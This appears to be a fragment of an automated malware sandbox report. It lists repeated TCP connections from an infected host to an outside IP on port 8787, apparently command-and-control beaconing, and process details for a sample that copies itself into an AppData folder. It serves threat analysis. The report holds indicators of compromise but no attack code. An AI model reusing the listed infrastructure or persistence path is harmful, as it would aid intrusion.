Dec 8, 2024 09:32:37.892250061 CET | 8787 | 49806 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:37.892556906 CET | 49806 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:37.893227100 CET | 49806 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:38.012439013 CET | 8787 | 49806 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:39.837166071 CET | 8787 | 49806 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:39.840148926 CET | 49806 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:39.840218067 CET | 49806 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:39.960299015 CET | 8787 | 49806 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:40.850291967 CET | 49813 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:40.969721079 CET | 8787 | 49813 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:40.969830990 CET | 49813 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:40.970662117 CET | 49813 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:41.090121984 CET | 8787 | 49813 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:42.953005075 CET | 8787 | 49813 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:42.953074932 CET | 49813 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:42.953160048 CET | 49813 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:43.072623014 CET | 8787 | 49813 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:43.959538937 CET | 49823 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:44.079046965 CET | 8787 | 49823 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:44.079144001 CET | 49823 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:44.079602003 CET | 49823 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:44.199292898 CET | 8787 | 49823 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:46.050798893 CET | 8787 | 49823 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:46.052190065 CET | 49823 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:46.052383900 CET | 49823 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:46.171608925 CET | 8787 | 49823 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:47.053422928 CET | 49829 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:47.172715902 CET | 8787 | 49829 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:47.173718929 CET | 49829 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:47.174339056 CET | 49829 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:47.293524027 CET | 8787 | 49829 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:49.113449097 CET | 8787 | 49829 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:49.113543987 CET | 49829 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:49.113543987 CET | 49829 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:49.233192921 CET | 8787 | 49829 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:50.115983009 CET | 49839 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:50.235296011 CET | 8787 | 49839 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:50.238231897 CET | 49839 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:50.238549948 CET | 49839 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:50.357784033 CET | 8787 | 49839 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:52.176213980 CET | 8787 | 49839 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:52.176280975 CET | 49839 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:52.176323891 CET | 49839 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:52.295605898 CET | 8787 | 49839 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:53.178464890 CET | 49845 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:53.298187971 CET | 8787 | 49845 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:53.298440933 CET | 49845 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:53.298839092 CET | 49845 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:53.418157101 CET | 8787 | 49845 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:55.234391928 CET | 8787 | 49845 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:55.236128092 CET | 49845 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:55.239387035 CET | 49845 | 8787 | 192.168.2.4 | 192.210.150.26
Dec 8, 2024 09:32:55.358649015 CET | 8787 | 49845 | 192.210.150.26 | 192.168.2.4
Dec 8, 2024 09:32:56.240880013 CET | 49855 | 8787 | 192.168.2.4 | 192.210.150.26
                                  Dec 8, 2024 09:32:56.362500906 CET878749855192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:32:56.362577915 CET498558787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:56.363080978 CET498558787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:56.482435942 CET878749855192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:32:58.296840906 CET878749855192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:32:58.296896935 CET498558787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:58.298662901 CET498558787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:58.418153048 CET878749855192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:32:59.304344893 CET498628787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:59.423695087 CET878749862192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:32:59.423804045 CET498628787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:59.424194098 CET498628787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:32:59.543531895 CET878749862192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:01.363646984 CET878749862192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:01.363801003 CET498628787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:01.363801003 CET498628787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:01.483195066 CET878749862192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:02.366664886 CET498698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:02.486120939 CET878749869192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:02.486203909 CET498698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:02.486512899 CET498698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:02.605815887 CET878749869192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:04.423086882 CET878749869192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:04.423244953 CET498698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:04.423244953 CET498698787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:04.542675972 CET878749869192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:05.440476894 CET498798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:05.560199976 CET878749879192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:05.560293913 CET498798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:05.561050892 CET498798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:05.680351019 CET878749879192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:07.501308918 CET878749879192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:07.501431942 CET498798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:07.501478910 CET498798787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:07.620820999 CET878749879192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:08.476731062 CET498858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:08.596193075 CET878749885192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:08.596273899 CET498858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:08.596635103 CET498858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:08.715915918 CET878749885192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:10.532605886 CET878749885192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:10.536220074 CET498858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:10.536221027 CET498858787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:10.655644894 CET878749885192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:11.475552082 CET498958787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:11.594964981 CET878749895192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:11.595058918 CET498958787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:11.595406055 CET498958787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:11.715557098 CET878749895192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:13.535861015 CET878749895192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:13.535923004 CET498958787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:13.536003113 CET498958787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:13.655260086 CET878749895192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:14.470380068 CET499028787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:14.589826107 CET878749902192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:14.590264082 CET499028787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:14.591198921 CET499028787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:14.710549116 CET878749902192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:16.532749891 CET878749902192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:16.536187887 CET499028787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:16.536267042 CET499028787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:16.655647993 CET878749902192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:17.420438051 CET499098787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:17.539813995 CET878749909192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:17.539901972 CET499098787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:17.543987036 CET499098787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:17.663294077 CET878749909192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:19.510231972 CET878749909192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:19.512193918 CET499098787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:19.516243935 CET499098787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:19.635569096 CET878749909192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:20.368369102 CET499188787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:20.488444090 CET878749918192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:20.492207050 CET499188787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:20.492641926 CET499188787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:20.611951113 CET878749918192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:22.441973925 CET878749918192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:22.442039967 CET499188787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:22.442128897 CET499188787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:22.664119005 CET878749918192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:23.272100925 CET499258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:23.392564058 CET878749925192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:23.392654896 CET499258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:23.393035889 CET499258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:23.512743950 CET878749925192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:25.333112001 CET878749925192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:25.333178997 CET499258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:25.333259106 CET499258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:25.452630997 CET878749925192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:26.131702900 CET499318787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:26.251063108 CET878749931192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:26.251255035 CET499318787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:26.251580000 CET499318787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:26.370887995 CET878749931192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:28.191987991 CET878749931192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:28.192081928 CET499318787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:28.192177057 CET499318787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:28.311520100 CET878749931192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:28.959827900 CET499408787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:29.079207897 CET878749940192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:29.079293966 CET499408787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:29.079819918 CET499408787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:29.199146032 CET878749940192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:31.020364046 CET878749940192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:31.020500898 CET499408787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:31.020543098 CET499408787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:31.139858961 CET878749940192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:31.772048950 CET499478787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:31.891473055 CET878749947192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:31.892179966 CET499478787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:31.892554998 CET499478787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:32.011902094 CET878749947192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:33.829690933 CET878749947192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:33.829750061 CET499478787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:33.829791069 CET499478787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:33.949105978 CET878749947192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:34.553756952 CET499538787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:34.673111916 CET878749953192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:34.675051928 CET499538787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:34.675405979 CET499538787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:34.794919014 CET878749953192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:36.610183001 CET878749953192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:36.610435009 CET499538787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:36.610435009 CET499538787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:36.729823112 CET878749953192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:37.303814888 CET499618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:37.423754930 CET878749961192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:37.426899910 CET499618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:37.427203894 CET499618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:37.546614885 CET878749961192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:39.364537954 CET878749961192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:39.364633083 CET499618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:39.364718914 CET499618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:39.483977079 CET878749961192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:40.037902117 CET499688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:40.157316923 CET878749968192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:40.158236980 CET499688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:40.158584118 CET499688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:40.277842045 CET878749968192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:42.207593918 CET878749968192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:42.207664967 CET499688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:42.207788944 CET499688787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:42.450251102 CET878749968192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:42.871392965 CET499738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:42.990798950 CET878749973192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:42.990926027 CET499738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:42.991370916 CET499738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:43.110878944 CET878749973192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:44.926826000 CET878749973192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:44.926966906 CET499738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:44.926966906 CET499738787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:45.046309948 CET878749973192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:45.553623915 CET499788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:45.672869921 CET878749978192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:45.673038006 CET499788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:45.673458099 CET499788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:45.792743921 CET878749978192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:47.610308886 CET878749978192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:47.610377073 CET499788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:47.610413074 CET499788787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:47.730007887 CET878749978192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:48.225275040 CET499868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:48.344917059 CET878749986192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:48.346309900 CET499868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:48.346729040 CET499868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:48.465977907 CET878749986192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:50.282869101 CET878749986192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:50.282939911 CET499868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:50.282995939 CET499868787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:50.402873993 CET878749986192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:50.866286993 CET499918787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:50.985745907 CET878749991192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:50.985965014 CET499918787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:50.986373901 CET499918787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:51.105808020 CET878749991192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:52.927443027 CET878749991192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:52.927508116 CET499918787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:52.927552938 CET499918787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:53.047919989 CET878749991192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:53.491123915 CET499978787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:53.610965014 CET878749997192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:53.611119032 CET499978787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:53.611414909 CET499978787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:53.730707884 CET878749997192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:55.548932076 CET878749997192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:55.549479961 CET499978787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:55.549531937 CET499978787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:55.668764114 CET878749997192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:56.100353003 CET500038787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:56.219885111 CET878750003192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:56.219986916 CET500038787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:56.220343113 CET500038787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:56.339575052 CET878750003192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:58.161431074 CET878750003192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:58.161540985 CET500038787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:58.161595106 CET500038787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:58.280890942 CET878750003192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:58.694076061 CET500128787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:58.813338995 CET878750012192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:33:58.814619064 CET500128787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:58.814855099 CET500128787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:33:58.934045076 CET878750012192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:00.751205921 CET878750012192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:00.751338005 CET500128787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:00.751391888 CET500128787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:00.870676041 CET878750012192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:01.272341013 CET500198787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:01.391622066 CET878750019192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:01.391704082 CET500198787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:01.392009974 CET500198787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:01.511284113 CET878750019192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:03.329407930 CET878750019192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:03.331738949 CET500198787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:03.331788063 CET500198787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:03.451421976 CET878750019192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:03.834780931 CET500258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:03.954149961 CET878750025192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:03.956273079 CET500258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:03.956620932 CET500258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:04.075905085 CET878750025192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:05.895773888 CET878750025192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:05.896306038 CET500258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:05.896342039 CET500258787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:06.015665054 CET878750025192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:06.384102106 CET500328787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:06.503531933 CET878750032192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:06.503622055 CET500328787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:06.503964901 CET500328787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:06.623229027 CET878750032192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:08.442800999 CET878750032192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:08.442878962 CET500328787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:08.442926884 CET500328787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:08.562206984 CET878750032192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:08.917506933 CET500388787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:09.036845922 CET878750038192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:09.037086010 CET500388787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:09.037256002 CET500388787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:09.156776905 CET878750038192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:10.970292091 CET878750038192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:10.972323895 CET500388787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:10.972393036 CET500388787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:11.091744900 CET878750038192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:11.428426027 CET500458787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:11.547799110 CET878750045192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:11.550729990 CET500458787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:11.609210968 CET500458787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:11.728574038 CET878750045192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:13.486058950 CET878750045192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:13.486193895 CET500458787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:13.486195087 CET500458787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:13.605742931 CET878750045192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:13.930177927 CET500528787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:14.049624920 CET878750052192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:14.049710989 CET500528787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:14.050024033 CET500528787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:14.169262886 CET878750052192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:15.985797882 CET878750052192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:15.985852957 CET500528787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:15.985898972 CET500528787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:16.105103016 CET878750052192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:16.413897038 CET500608787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:16.533211946 CET878750060192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:16.533301115 CET500608787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:16.533571005 CET500608787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:16.652865887 CET878750060192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:18.471347094 CET878750060192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:18.471476078 CET500608787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:18.471476078 CET500608787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:18.590791941 CET878750060192.210.150.26192.168.2.4
                                  Dec 8, 2024 09:34:18.886725903 CET500618787192.168.2.4192.210.150.26
                                  Dec 8, 2024 09:34:19.006103039 CET878750061192.210.150.26192.168.2.4

</grreplace_placeholder>

                                  Target ID:0
                                  Start time:03:31:18
                                  Start date:08/12/2024
                                  Path:C:\Users\user\Desktop\7056ZCiFdE.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\7056ZCiFdE.exe"
                                  Imagebase:0x880000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:03:31:21
                                  Start date:08/12/2024
                                  Path:C:\Users\user\AppData\Local\Milburr\Allene.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\7056ZCiFdE.exe"
                                  Imagebase:0x5d0000
                                  File size:885'760 bytes
                                  MD5 hash:6F0604F8A16B94B61D714DFEC11D0358
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
